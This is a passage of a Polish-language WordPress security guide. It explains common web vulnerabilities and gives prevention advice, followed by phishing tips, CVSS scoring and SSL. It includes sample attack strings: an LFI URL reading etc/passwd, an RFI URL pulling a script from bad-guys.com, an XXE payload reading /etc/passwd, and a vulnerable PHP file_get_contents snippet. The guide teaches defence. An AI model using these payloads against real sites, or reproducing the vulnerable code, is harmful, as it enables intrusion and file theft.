 document.write("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"); document.writeln("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>");

8. Luka w zabezpieczeniach umożliwiająca fałszowanie żądań między witrynami

Luka CSRF lub Cross-Site Request Forgery występuje, gdy cyberprzestępca nakłania użytkownika do wykonania niezamierzonych działań. Atakujący fałszuje żądanie użytkownika do aplikacji.

Przykład fałszowania żądań między witrynami

W naszym zestawieniu luk w zabezpieczeniach WordPress ze stycznia 2020 r. pisaliśmy o luce Cross-Site Request Forgery wykrytej we wtyczce Code Snippets. (Wtyczka została szybko załatana w wersji 2.14.0)

Brak ochrony CRSF przez wtyczkę pozwalał każdemu sfałszować żądanie w imieniu administratora i wstrzyknąć kod wykonywalny na zagrożoną stronę. Osoba atakująca mogła wykorzystać tę lukę do wykonania złośliwego kodu, a nawet do całkowitego przejęcia witryny.

Jak zapobiegać fałszowaniu żądań między witrynami

Większość struktur kodowania ma wbudowane zsynchronizowane zabezpieczenia tokenów w celu ochrony przed CSRF i należy ich używać.

Istnieją również zewnętrzne komponenty, takie jak CSRF Protector Project, które można wykorzystać do ochrony podatności PHP i Apache CSRF.

9. Luka w zabezpieczeniach umożliwiająca fałszowanie żądań po stronie serwera

Luka w zabezpieczeniach SSRF lub Server-Site Request Forger umożliwia atakującemu oszukanie aplikacji po stronie serwera w celu wysłania żądań HTTP do dowolnej wybranej przez siebie domeny.

Przykład fałszowania żądań po stronie serwera

Luka SSRF może zostać wykorzystana do przeprowadzenia ataku typu Reflected Cross-Site Scripting. Osoba atakująca może pobrać złośliwy skrypt ze strony bad-guys.com i udostępnić go wszystkim odwiedzającym witrynę.

Jak zapobiegać fałszowaniu żądań po stronie serwera?

Pierwszym krokiem do złagodzenia luk SSRF jest sprawdzenie poprawności danych wejściowych. Na przykład, jeśli serwer korzysta z adresów URL dostarczonych przez użytkowników do pobierania różnych plików, należy sprawdzić poprawność adresu URL i zezwolić tylko na zaufane hosty docelowe.

Aby uzyskać więcej informacji na temat zapobiegania SSRF, zapoznaj się ze ściągawką OWASP.

10. Podatność na eskalację uprawnień

Luka w zabezpieczeniach Eskalacja uprawnień umożliwia atakującemu wykonywanie zadań, które normalnie wymagają uprawnień wyższego poziomu.

Przykład eskalacji uprawnień

W naszym zestawieniu luk w zabezpieczeniach WordPress z listopada 2020 r. poinformowaliśmy o luce eskalacji uprawnień, która została znaleziona we wtyczce Ultimate Member (luka została załatana w wersji 2.1.12).

Osoba atakująca może dostarczyć parametr tablicy dla meta użytkownika wp_capabilities który definiuje rolę użytkownika. Podczas procesu rejestracji przesłane dane rejestracyjne zostały przekazane do funkcji update_profile , a wszelkie odpowiednie metadane, które zostały przesłane, niezależnie od tego, co zostało przesłane, zostaną zaktualizowane dla nowo zarejestrowanego użytkownika.

Luka zasadniczo umożliwiała nowemu użytkownikowi zgłoszenie się do administratora podczas rejestracji.

Jak zapobiegać eskalacji uprawnień

iThemes Security Pro może pomóc chronić Twoją witrynę przed uszkodzoną kontrolą dostępu, ograniczając dostęp administratora do listy zaufanych urządzeń.

11. Luka umożliwiająca zdalne wykonanie kodu

Luka RCE lub Remote Code Execution umożliwia atakującemu dostęp do komputera lub serwera, wprowadzanie zmian, a nawet przejęcie kontroli nad nim.

Przykład zdalnego wykonania kodu

W 2018 r. Microsoft ujawnił usterkę umożliwiającą zdalne wykonanie kodu znalezioną w programie Excel.

Osoba atakująca, której uda się wykorzystać lukę, może uruchomić dowolny kod w kontekście bieżącego użytkownika. Jeśli bieżący użytkownik jest zalogowany z uprawnieniami administratora, osoba atakująca może przejąć kontrolę nad systemem, którego dotyczy luka. Atakujący może wówczas zainstalować programy; przeglądać, zmieniać lub usuwać dane; lub utwórz nowe konta z pełnymi prawami użytkownika. Użytkownicy, których konta są skonfigurowane tak, aby mieć mniej praw użytkownika w systemie, mogą być mniej podatni niż użytkownicy, którzy działają z uprawnieniami administratora.

Jak zapobiec zdalnemu wykonaniu kodu?

Najłatwiejszym sposobem ograniczenia luki RCE jest sprawdzenie poprawności danych wprowadzanych przez użytkownika poprzez filtrowanie i usuwanie niepożądanych znaków.

Nasza firma macierzysta Liquid Web ma świetny artykuł na temat zapobiegania zdalnemu wykonywaniu kodu.

14. Luka dotycząca dołączania plików

Luka w zabezpieczeniach pliku File Inclusion występuje, gdy aplikacja internetowa umożliwia użytkownikowi przesyłanie danych wejściowych do plików lub przesyłanie plików na serwer.

Istnieją dwa rodzaje luk w zabezpieczeniach dołączania plików, lokalne i zdalne.

15. Luka w zabezpieczeniach plików lokalnych

Luka LFI lub Local File Inclusion umożliwia atakującemu odczytywanie, a czasami uruchamianie plików na serwerze witryny.

Przykład włączenia pliku lokalnego

Przyjrzyjmy się raz jeszcze yourfavesite.com , gdzie ścieżki, które mają include stwierdzenia, nie są odpowiednio oczyszczone. Na przykład spójrzmy na poniższy adres URL.

 yourfavesite.com/module.php?file=example.file

Atakujący może zmienić parametr adresu URL, aby uzyskać dostęp do dowolnego pliku na serwerze.

 yourfavesite.com/module.php?file=etc/passwd

Zmiana wartości pliku w adresie URL może umożliwić osobie atakującej wyświetlenie zawartości pliku psswd.

Jak zapobiegać dołączaniu plików lokalnych?

Utwórz listę dozwolonych plików, które może zawierać strona, a następnie użyj identyfikatora, aby uzyskać dostęp do wybranego pliku. A następnie zablokuj każde żądanie zawierające nieprawidłowy identyfikator.

16. Luka w zabezpieczeniach zdalnego włączania plików

Luka RFI lub Remote File Inclusion umożliwia atakującemu dołączenie pliku, zwykle wykorzystując mechanizmy „dynamicznego dołączania plików” zaimplementowane w docelowej aplikacji.

Przykład zdalnego dołączania plików

WordPress Plugin WP with Spritz został zamknięty w repozytorium WordPress.org, ponieważ zawierał lukę RFI.

Poniżej znajduje się kod źródłowy luki:

 if(isset($_GET['url'])){ $content=file_get_contents($_GET['url']);

Kod można wykorzystać, zmieniając wartość wartości content.filter.php?url= . Na przykład:

 yoursite.com//wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://bad-guys.com/exec

Zapobieganie zdalnemu włączaniu plików

Utwórz listę dozwolonych plików, które może zawierać strona, a następnie użyj identyfikatora, aby uzyskać dostęp do wybranego pliku. A następnie zablokuj każde żądanie zawierające nieprawidłowy identyfikator.

17. Luka w zabezpieczeniach przechodzenia katalogów

Luka Directory Traversal lub File Traversal umożliwia osobie atakującej odczytywanie dowolnych plików na serwerze, na którym działa aplikacja.

Przykład przechodzenia przez katalog

Wersje WordPress 5.7 – 5.03 były podatne na ataki z przechodzeniem katalogów, ponieważ nie potrafiły prawidłowo zweryfikować danych wejściowych użytkownika. Atakujący mający dostęp do konta z co najmniej uprawnieniami author może wykorzystać lukę w przejściu katalogów i wykonać złośliwy kod PHP na bazowym serwerze, prowadząc do pełnego zdalnego przejęcia.

Jak zapobiegać przechodzeniu katalogów

Podczas tworzenia szablonów lub korzystania z plików językowych programiści mogą używać indeksów zamiast rzeczywistych części nazw plików.

18. Luka w zabezpieczeniach złośliwego przekierowania

Luka w zabezpieczeniach złośliwego przekierowania umożliwia atakującemu wstrzyknięcie kodu w celu przekierowania odwiedzających witrynę na inną witrynę.

Przykład złośliwego przekierowania

Załóżmy, że szukasz niebieskiego swetra, korzystając z wyszukiwarki w butiku internetowym.

Niestety, serwer butiku nie koduje poprawnie danych wprowadzanych przez użytkownika, a osoba atakująca była w stanie wstrzyknąć złośliwy skrypt przekierowujący do zapytania wyszukiwania.

Tak więc, gdy wpiszesz niebieski sweter w polu wyszukiwania butiku i naciśniesz Enter, trafisz na stronę atakującego zamiast na stronę butiku ze swetrami pasującymi do opisu Twojego wyszukiwania.

Jak zapobiegać złośliwym przekierowaniom

Możesz chronić się przed złośliwymi przekierowaniami, oczyszczając dane wprowadzane przez użytkowników, weryfikując adresy URL i uzyskując potwierdzenie odwiedzających dla wszystkich przekierowań poza witrynę.

19. Luka dotycząca zewnętrznego podmiotu XML

Luka w zabezpieczeniach XXE lub XML External Entity umożliwia osobie atakującej nakłonienie analizatora składni XML do przekazania poufnych informacji podmiotowi zewnętrznemu znajdującemu się pod jego kontrolą.

Przykład zewnętrznej jednostki XML

Osoba atakująca może wykorzystać lukę XXE, aby uzyskać dostęp do poufnych plików, takich jak etc/passwd, które przechowują informacje o koncie użytkownika.

 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>

Jak zapobiegać zewnętrznej jednostce XML?

Najlepszym sposobem zapobiegania XXE jest używanie mniej złożonych formatów danych, takich jak JSON, i unikanie serializacji poufnych danych.

20. Atak odmowy usługi

Atak DoS lub atak typu Denial-of-Service to celowa próba uniemożliwienia użytkownikom dostępu do witryny lub aplikacji poprzez zalanie jej ruchem sieciowym.

W ataku typu DDoS Distributed Denial of Service osoba atakująca korzysta z wielu źródeł, aby zalać sieć ruchem. Atakujący przejmie grupy zainfekowanych złośliwym oprogramowaniem komputerów, routerów i urządzeń IoT, aby zwiększyć przepływ ruchu.

Przykład ataku typu „odmowa usługi”

Największy w historii atak DDoS (Distributed Denial-of-Service) został przeprowadzony przeciwko AWS w lutym tego roku. Amazon poinformował, że AWS Shield, ich zarządzana usługa ochrony przed zagrożeniami, zaobserwowała i złagodziła ten ogromny atak DDoS. Atak trwał 3 dni i osiągnął szczyt 2,3 terabajta na sekundę.

Jak zapobiegać atakom typu „odmowa usługi”?

Istnieją 2 główne sposoby na złagodzenie ataku DoS.

1. Kup więcej hostingu niż potrzebujesz. Dysponowanie dodatkowymi zasobami może pomóc w przetrwaniu zwiększonego zapotrzebowania spowodowanego atakiem DoS.
2. Użyj zapory na poziomie serwera, takiej jak Cloudflare. Zapora może wykryć nietypowy wzrost ruchu i zapobiec przeciążeniu witryny.

21. Rejestrowanie naciśnięć klawiszy

Rejestrowanie naciśnięć klawiszy , znane również jako rejestrowanie klawiszy lub przechwytywanie klawiatury, ma miejsce, gdy haker potajemnie monitoruje i rejestruje naciśnięcia klawiszy odwiedzających witrynę.

Przykład rejestrowania naciśnięć klawiszy

W 2017 r. haker z powodzeniem zainstalował złośliwy kod JavaScript na serwerze producenta smartfonów OnePlus.

Korzystając ze złośliwego kodu, osoby atakujące monitorowały i rejestrowały naciśnięcia klawiszy klientów OnePlus podczas wprowadzania danych karty kredytowej. Hakerzy zarejestrowali i zebrali naciśnięcia klawiszy 40 000 klientów, zanim OnePlus wykrył i załatał włamanie.

Jak zapobiec rejestrowaniu naciśnięć klawiszy?

Zaktualizuj wszystko! Zazwyczaj atakujący będzie musiał wykorzystać inną istniejącą lukę w zabezpieczeniach, aby wstrzyknąć keylogger na komputer lub serwer. Aktualizowanie wszystkiego za pomocą najnowszych poprawek zabezpieczeń uniemożliwi hakerom łatwe zainstalowanie keyloggera na Twojej stronie internetowej lub komputerze.

Bonus: wyłudzanie informacji

Hakerzy i cyberprzestępcy próbują wykorzystać luki w oprogramowaniu. Hakerzy atakują również i wykorzystują ludzi. Jedną z powszechnych metod wykorzystywania jest phishing.

Co to jest phishing?

Phishing to metoda cyberataku wykorzystująca pocztę e-mail, media społecznościowe, wiadomości tekstowe i połączenia telefoniczne w celu nakłonienia ofiary do podania danych osobowych. Atakujący wykorzysta te informacje, aby uzyskać dostęp do kont osobistych lub popełnić oszustwo związane z tożsamością.

Jak rozpoznać e-mail phishingowy

Jak dowiedzieliśmy się wcześniej w tym poście, niektóre luki wymagają pewnego rodzaju interakcji użytkownika, aby je wykorzystać. Jednym ze sposobów, w jaki haker nakłania ludzi do udziału w ich nikczemnych przedsięwzięciach, jest wysyłanie wiadomości phishingowych.

Nauczenie się, jak rozpoznać wiadomość phishingową, może uchronić Cię przed nieumyślnym wmieszaniem się w plany cyberprzestępców.

4 wskazówki, jak rozpoznać wiadomość phishingową :

1. Spójrz na adres e-mail nadawcy — jeśli otrzymasz wiadomość e-mail od firmy, część adresu e-mail nadawcy po znaku „@” powinna być zgodna z nazwą firmy.
   
   Jeśli e-mail reprezentuje firmę lub podmiot rządowy, ale używa publicznego adresu e-mail, takiego jak „@gmail”, jest oznaką wiadomości phishingowej.
   
   Zwracaj uwagę na subtelne błędy w pisowni nazwy domeny. Na przykład spójrzmy na ten adres e-mail [email protected] Widzimy, że Netflix ma na końcu dodatkowy „x”. Błędna pisownia jest wyraźnym sygnałem, że wiadomość e-mail została wysłana przez oszusta i powinna zostać natychmiast usunięta.
   
2. Szukaj błędów gramatycznych — wiadomość e-mail pełna błędów gramatycznych jest oznaką złośliwej wiadomości e-mail. Wszystkie słowa mogą być napisane poprawnie, ale w zdaniach brakuje słów, które sprawiłyby, że zdanie byłoby spójne. Na przykład „Twoje konto zostało zhakowane. Zaktualizuj hasło, aby zabezpieczyć konto”.
   
   Każdy popełnia błędy i nie każdy e-mail z literówką lub dwiema jest próbą oszustwa. Jednak wiele błędów gramatycznych wymaga bliższego przyjrzenia się przed udzieleniem odpowiedzi.
   
3. Podejrzane załączniki lub linki – warto zatrzymać się na chwilę przed interakcją z jakimikolwiek załącznikami lub linkami zawartymi w wiadomości e-mail.
   
   Jeśli nie rozpoznajesz nadawcy wiadomości e-mail, nie pobieraj żadnych załączników zawartych w wiadomości e-mail, ponieważ mogą one zawierać złośliwe oprogramowanie i zainfekować komputer. Jeśli e-mail twierdzi, że pochodzi od firmy, możesz skorzystać z Google ich informacji kontaktowych, aby zweryfikować, że e-mail został od nich wysłany, zanim otworzysz jakiekolwiek załączniki.
   
   Jeśli wiadomość e-mail zawiera łącze, możesz najechać kursorem myszy na łącze, aby sprawdzić, czy adres URL wysyła Cię tam, gdzie powinien.
   
4. Uważaj na pilne prośby – częstą sztuczką stosowaną przez oszustów jest stworzenie poczucia pilności. Złośliwy e-mail może stworzyć scenariusz, który wymaga natychmiastowego działania. Im więcej masz czasu na przemyślenie, tym większa szansa, że ​​zidentyfikujesz żądanie pochodzące od oszusta.
   
   Możesz otrzymać wiadomość e-mail od swojego „szefa” z prośbą o zapłacenie dostawcy JAK NAJSZYBCIEJ lub z banku informującego Cię, że Twoje konto zostało zhakowane i wymagane jest natychmiastowe działanie.

Jak zmierzyć wagę luki w WordPressie

Istnieje kilka rodzajów luk w zabezpieczeniach WordPressa, wszystkie o różnym stopniu ryzyka. Na szczęście dla nas, Krajowa Baza Danych Podatności – projekt Narodowego Instytutu Nauki i Technologii – posiada kalkulator systemu oceny podatności, który pozwala określić ryzyko wystąpienia podatności.

W tej sekcji przewodnika po lukach w zabezpieczeniach WordPress omówimy metryki i poziomy ważności systemu oceny luk w zabezpieczeniach. Chociaż ta sekcja jest nieco bardziej techniczna, niektórzy użytkownicy mogą uznać ją za przydatną do pogłębienia wiedzy na temat oceny luk w zabezpieczeniach WordPress i ich wagi.

Wspólne wskaźniki systemu oceny podatności WordPress

Równanie systemu oceny podatności wykorzystuje trzy różne zestawy wyników w celu określenia ogólnego wyniku dotkliwości.

1. Podstawowe metryki

Grupa metryki Base reprezentuje cechy luki, które są stałe w środowiskach użytkowników.

Metryki podstawowe są podzielone na dwie grupy: Exploitability i Impact.

1.1. Wskaźniki dotyczące możliwości wykorzystania

Ocena podatności na wykorzystanie opiera się na tym, jak trudno jest osobie atakującej wykorzystać tę lukę. Wynik jest obliczany przy użyciu 5 różnych zmiennych.

1.1.1. Wektor ataku (AV)

Wynik wektora ataku opiera się na metodzie wykorzystania luki. Wynik będzie wyższy, im bardziej osoba atakująca może się oddalić, aby wykorzystać tę lukę.

Chodzi o to, że liczba potencjalnych napastników będzie znacznie większa, jeśli luka może zostać wykorzystana przez sieć, w porównaniu z luką, która wymaga fizycznego dostępu do exploita urządzenia.

Im więcej potencjalnych napastników, tym większe ryzyko wykorzystania, a zatem punktacja wektora ataku przyznana luce będzie wyższa.

1.1.2. Złożoność ataku (AC)

Wartość złożoności jest oparta na warunkach wymaganych do wykorzystania luki. Niektóre warunki mogą wymagać zebrania większej ilości informacji o miejscu docelowym, obecności pewnych ustawień konfiguracji systemu lub wyjątków obliczeniowych.

Wynik złożoności ataku będzie wyższy, im mniejsza złożoność wymagana do wykorzystania luki.

1.1.3. Wymagane uprawnienia (PR)

Wynik wymaganych uprawnień jest obliczany na podstawie uprawnień, które osoba atakująca musi uzyskać przed wykorzystaniem luki w zabezpieczeniach. Zagłębimy się w to nieco bardziej w sekcji Uwierzytelnione a nieuwierzytelnione.

Wynik będzie najwyższy, jeśli nie są wymagane żadne uprawnienia.

1.1.4. Interakcja z użytkownikiem (UI)

Wynik interakcji użytkownika jest określany na podstawie tego, czy luka w zabezpieczeniach wymaga interakcji użytkownika, aby ją wykorzystać.

Wynik będzie najwyższy, gdy osoba atakująca nie będzie potrzebować interakcji z użytkownikiem, aby wykorzystać tę lukę.

1.1.5. Zakres

Wynik zakresu jest oparty na luce w jednym składniku oprogramowania, która ma wpływ na zasoby wykraczające poza jego zakres zabezpieczeń.

Zakres zabezpieczeń obejmuje inne komponenty, które zapewniają funkcjonalność wyłącznie dla tego komponentu, nawet jeśli te inne komponenty mają własne uprawnienia bezpieczeństwa.

Wynik jest najwyższy, gdy następuje zmiana zakresu.

1.2. Wskaźniki wpływu

Metryki Impact wychwytują bezpośrednie skutki pomyślnie wykorzystanej luki w zabezpieczeniach.

1.2.1. Poufny wpływ (C)

Ta poufna ocena wpływu mierzy wpływ na poufność informacji zarządzanych przez wykorzystywane oprogramowanie.

Wynik jest najwyższy, gdy utrata oprogramowania, którego dotyczy problem, jest największa.

1.2.2. Uczciwość (I)

Ten wynik integralności jest oparty na wpływie na integralność pomyślnie wykorzystanej luki.

Wynik jest najwyższy, gdy konsekwencje działania oprogramowania, którego dotyczy problem, są największe.

1.2.3. Dostępność (A)

Ocena dostępności jest oparta na wpływie dostępności wykorzystywanego oprogramowania.

Punktacja jest najwyższa, gdy konsekwencja dotkniętego elementu jest największa.

Obliczanie wyniku bazowego CVSS

Wynik podstawowy jest funkcją podrzędnych równań oceny wpływu i możliwości wykorzystania. Jeżeli wynik podstawowy jest zdefiniowany jako:

 If (Impact sub score <= 0) 0 else, Scope Unchanged 4 Roundup(Minimum[(Impact+Exploitability),10]) Scope Changed Roundup(Minimum[1.08×(Impact+Exploitability),10]) and the Impact subscore (ISC) is defined as, Scope Unchanged 6.42 × ISCBase Scope Changed 7.52 × [ISCBase - 0.029] - 3.25 × [ISCBase - 0.02] 15 Where, ISCBase = 1 - [(1 - ImpactConf) × (1 - ImpactInteg) × (1 - ImpactAvail)] And the Exploitability sub score is, 8.22 × AttackVector × AttackComplexity × PrivilegeRequired × UserInteraction

2. Wskaźniki wyników czasowych

Metryki Temporal mierzą aktualny stan technik exploitów, istnienie jakichkolwiek poprawek lub obejścia lub pewność co do opisu luki w zabezpieczeniach.

Oczekuje się, że wskaźniki czasowe będą się zmieniać i będą się zmieniać w czasie.

2.1. Dojrzałość kodu wykorzystania (E)

Dojrzałość kodu exploita opiera się na prawdopodobieństwie zaatakowania luki.

Im łatwiej można wykorzystać lukę, tym wyższy wynik.

2.2. Poziom naprawczy (RL)

Poziom naprawy luki w zabezpieczeniach jest ważnym czynnikiem ustalania priorytetów. Obejścia lub poprawki mogą oferować tymczasowe rozwiązania do czasu wydania oficjalnej poprawki lub uaktualnienia.

Im mniej oficjalna i trwała poprawka, tym wyższy wynik podatności.

2.3. Raport zaufania (RC)

Miernik Pewność raportu mierzy poziom pewności, że istnieje luka w zabezpieczeniach oraz wiarygodność szczegółów technicznych.

Im bardziej podatność zostanie zweryfikowana przez dostawcę lub inne renomowane źródła, tym wyższy wynik.

Obliczanie punktacji czasowego CVSS

Punktacja czasowa jest zdefiniowana jako:

 Roundup(BaseScore v× ExploitCode Maturity × RemediationLevel × ReportConfidence)

3. Wskaźniki oceny środowiskowej

Metryki środowiskowe pozwalają analitykom dostosować punktację CVSS w oparciu o znaczenie zasobów IT, których dotyczy problem.

Mierniki możliwości wykorzystania i wpływu na środowisko są zmodyfikowanym odpowiednikiem mierników podstawowych i mają przypisane wartości na podstawie rozmieszczenia komponentów infrastruktury organizacyjnej. Zapoznaj się z powyższymi sekcjami dotyczącymi podstawowych danych, aby wyświetlić wartości i opisy danych dotyczących możliwości wykorzystania i wpływu.

Wskaźniki środowiskowe zawierają dodatkową grupę, Modyfikatory podskalowania wpływu.

3.1. Wskaźniki modyfikatorów podskalowania wpływu

Miary Impact Subscore Modifiers oceniają specyficzne wymagania bezpieczeństwa dotyczące poufności (CR), integralności (IR) i dostępności (AR), umożliwiając precyzyjne dostosowanie wyniku środowiskowego do środowiska użytkownika.

Obliczanie wyniku środowiskowego CVSS

Ocena środowiskowa jest zdefiniowana jako:

 If (Modified Impact Sub score <= 0) 0 else, If Modified Scope is Unchanged Round up(Round up (Minimum [ (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) If Modified Scope is Changed Round up(Round up (Minimum [1.08 × (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) And the modified Impact sub score is defined as, If Modified Scope is Unchanged 6.42 × [ISC Modified ] If Modified Scope is Changed 7.52 × [ISC Modified - 0.029]-3.25× [ISC Modified × 0.9731 - 0.02] 13 Where, ISC Modified = Minimum [[1 - (1 - M.IConf × CR) × (1 - M.IInteg × IR) × (1 - M.IAvail × AR)], 0.915] The Modified Exploitability sub score is, 8.22 × M.AttackVector × M.AttackComplexity × M.PrivilegeRequired × M.UserInteraction 4 Where “Round up” is defined as the smallest number, specified to one decimal place, that is equal to or higher than its input. For example, Round up (4.02) is 4.1; and Round up (4.00) is 4.0.

Ogólny wynik i ważność CVSS

Wynik CVSS (General Common Vulnerability Scoring System) jest reprezentacją wyników podstawowych, czasowych i środowiskowych.

Ogólny wynik CVSS może być wykorzystany do zorientowania się, jak poważna lub poważna jest podatność na zagrożenia.

Przykład oceny ważności CVSS w świecie rzeczywistym

W naszym podsumowaniu luk w zabezpieczeniach z grudnia 2020 r. pisaliśmy o luce we wtyczce Easy WP SMTP. Luka dnia zerowego (omówimy luki dnia zerowego w następnej sekcji) umożliwiła atakującemu przejęcie kontroli nad kontem administratora i była wykorzystywana na wolności.

Przyglądając się wpisowi National Vulnerability Database, możemy znaleźć ocenę ważności luki WP SMTP.

Podzielmy kilka rzeczy z powyższego zrzutu ekranu WP SMTP NVDB.

Wynik podstawowy : Wynik podstawowy wynosi 7,5, co oznacza, że ​​wskaźnik ważności luki jest wysoki.

Wektor : Wektor mówi nam, że wynik jest oparty na równaniach podatności CVSS 3.1 i metrykach użytych do obliczenia wyniku.

Oto część metryczna wektora.

 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Teraz użyjmy wartości i opisów metryki podstawowej z wcześniejszej części tego postu, aby zrozumieć osiem wartości metryki wektora.

1. AV:N – Oznacza to, że wektor ataku (AV) luki to sieć (N). Innymi słowy, atakujący potrzebuje jedynie dostępu do sieci, aby wykorzystać tę lukę.
2. AC:L – Złożoność ataku (AC) luki jest niska (L). Innymi słowy, każdy skryptowy dzieciak może wykorzystać tę lukę.
3. PR:N — Wymagane uprawnienia (PR) potrzebne do wykorzystania luki to Brak (N). Tak więc luka nie wymaga uwierzytelnionego użytkownika do wykorzystania. (W dalszej części tego postu omówimy różnicę między lukami uwierzytelnionymi i nieuwierzytelnionymi).
4. UI:N — Interakcja użytkownika (UI) wymagana do wykorzystania tej luki to Brak (N). Atakujący ma więc środki do samodzielnego wykorzystania luki.
5. S:U – Oznacza to, że zakres (S) podatności jest niezmieniony (U). W przypadku tej luki podatny składnik i zagrożony składnik są takie same.
6. C:H – Wpływ poufności (C) luki jest wysoki (H). Wykorzystanie tej luki powoduje całkowitą utratę poufności.
7. I:N – Wpływ na integralność (I) tej luki to Brak (N). Wykorzystanie luki nie powoduje utraty integralności ani wiarygodności wrażliwych informacji.
8. O:N – Oznacza to, że wpływ dostępności (A) jest Brak (N). Wykorzystanie luki nie wpłynie na dostępność Twojej witryny.

Wynik CVSS może nam pomóc określić wagę i zakres danej podatności. W następnych kilku sekcjach omówimy kilka ważnych terminów dotyczących luk w zabezpieczeniach, które często są zawarte w ujawnianych informacjach o lukach.

Zawijanie

W tej sekcji poznaliśmy kilka ważnych elementów bezpieczeństwa WordPress, w tym motywacje hakerów, różne rodzaje włamań, luki, które wykorzystują przestępcy online, jak zmniejszyć ryzyko luk w zabezpieczeniach oraz jak określić ryzyko, jakie dana luka stwarza dla twojego Strona internetowa.

Zrozumienie, w jaki sposób atakujący próbują włamać się do naszych stron internetowych i ich celu po włamaniu na nasze strony internetowe, pozwala nam zbudować odpowiednią ochronę.

W kolejnych sekcjach dowiesz się, jak chronić swoją witrynę przed niemal każdym rodzajem ataku, jaki może na Ciebie rzucić haker.

Sekcja 4: Zabezpieczanie serwera

Pierwszym krokiem w Twojej strategii bezpieczeństwa WordPress jest zabezpieczenie serwera. Twój serwer przechowuje wszystkie pliki i kod, dzięki którym Twoja witryna działa.

W tej sekcji dowiesz się:

1. Znaczenie wyboru dobrego gospodarza.
2. Jak szyfrować komunikację w Twojej witrynie.
3. Jak zapora może pomóc w zabezpieczeniu Twojej witryny.

Wybierz odpowiedni hosting

Nie wszystkie hosty internetowe są sobie równe, a wybór jednego wyłącznie na podstawie ceny może w dłuższej perspektywie kosztować znacznie więcej w przypadku problemów z bezpieczeństwem WordPress. Większość współdzielonych środowisk hostingowych jest bezpieczna, ale niektóre nie rozdzielają odpowiednio kont użytkowników.

Twój host powinien być czujny, jeśli chodzi o stosowanie najnowszych poprawek bezpieczeństwa i przestrzeganie innych ważnych najlepszych praktyk związanych z bezpieczeństwem hostingu WordPress związanych z bezpieczeństwem serwera i plików. Twój host powinien być czujny, jeśli chodzi o stosowanie najnowszych poprawek bezpieczeństwa i przestrzeganie innych ważnych najlepszych praktyk dotyczących bezpieczeństwa hostingu związanych z bezpieczeństwem serwera i plików.

Zaszyfruj swoją witrynę WordPress za pomocą SSL

Secure Sockets Layer, znany również jako SSL, to technologia zabezpieczeń, która zapewnia szyfrowanie między klientem a serwerem internetowym. Mówiąc prościej, „klient” to przeglądarka internetowa, taka jak Chrome lub Safari, a „serwer” to Twoja witryna lub sklep internetowy.

Prostym sposobem sprawdzenia, czy odwiedzana witryna internetowa ma zainstalowany certyfikat SSL, jest sprawdzenie w pasku adresu przeglądarki, czy adres URL zaczyna się od HTTP czy HTTPS. Jeśli adres URL zaczyna się od HTTPS, bezpiecznie przeglądasz witrynę przy użyciu protokołu SSL.

Dlaczego SSL jest tak ważny?

Brak certyfikatu SSL w 2021 roku jest drogi. Czemu? Jeśli nie masz włączonej obsługi SSL w swojej witrynie, potencjalnym klientom będzie trudniej odkryć Twoje istnienie, a ci, którzy znajdą Twoją witrynę, mogą odstraszyć się od dawania Ci jakichkolwiek pieniędzy.

Za każdym razem, gdy dokonujemy zakupu online, następuje komunikacja między Twoją przeglądarką a sklepem internetowym. Na przykład, gdy wprowadzimy numer naszej karty kredytowej do naszej przeglądarki, nasza przeglądarka udostępni ten numer sklepowi internetowemu. Po otrzymaniu płatności sklep informuje przeglądarkę, że zakup się powiódł.

Jedną rzeczą, o której należy pamiętać w przypadku informacji wymienianych między naszą przeglądarką a serwerem sklepu, jest to, że informacje te zatrzymują się kilkakrotnie w tranzycie. SSL zapewnia szyfrowanie komunikacji, aby zapewnić, że nasza karta kredytowa nie będzie widoczna, dopóki nie dotrze do miejsca docelowego serwera sklepu.

Aby lepiej zrozumieć, jak działa szyfrowanie, zastanów się, jak dostarczane są nasze zakupy. Jeśli kiedykolwiek śledziłeś stan dostawy zakupu online, zauważyłeś, że Twoje zamówienie zostało zatrzymane kilka razy przed dotarciem do domu. Jeśli sprzedawca nie zapakował prawidłowo Twojego zakupu, ludzie mogliby łatwo zobaczyć, co kupiłeś.

SSL jest kluczowym narzędziem zapobiegającym przechwytywaniu poufnych informacji, takich jak hasła i numery kart kredytowych, które są udostępniane klientowi i serwerowi internetowemu.

Dlaczego certyfikat SSL jest niezbędny dla każdej strony internetowej?

Korzyści związane z bezpieczeństwem WordPressa, które czerpiesz z posiadania certyfikatu SSL na swojej stronie internetowej, są wystarczające, aby uczynić go niezbędnym dla każdej witryny. Jednak, aby zachęcić wszystkich do ochrony odwiedzających witrynę, przeglądarki internetowe i wyszukiwarki stworzyły negatywne zachęty, aby zachęcić wszystkich do korzystania z SSL. W tej sekcji omówimy kosztowne konsekwencje niewłączenia SSL w Twojej witrynie.

1. Brak włączonej obsługi SSL zaszkodzi Twoim rankingom SEO

Search Engine Optimization lub SEO to proces optymalizacji witryny, która ma zostać odkryta w sposób organiczny na stronach wyników wyszukiwania. Zaletą SEO jest to, że jest to doskonały sposób na zwiększenie organicznego i bezpłatnego ruchu na Twojej stronie. Jeśli sprzedajesz kurs pieczenia chleba, chcesz, aby Twoja witryna znajdowała się na pierwszej stronie wyników wyszukiwania w Google lub Duck Duck Go w przypadku kursu pieczenia chleba.

Bez włączonej obsługi SSL w Twojej witrynie wyszukiwarki będą cię karać i obniżać twoje rankingi. Jednym ze wskaźników używanych przez Google do pozycjonowania witryn w wynikach wyszukiwania jest wiarygodność. W najlepszym interesie Google jest, aby nie kierować użytkowników na niebezpieczne strony internetowe, dlatego w ich algorytmie rankingowym bardzo ważna jest wiarygodność. Ponieważ SSL dodaje tak wiele zabezpieczeń, jest to znacząca część tego, w jaki sposób Google ocenia wiarygodność witryny.

2. Przeglądarki oznaczają witryny bez SSL jako niezabezpieczone

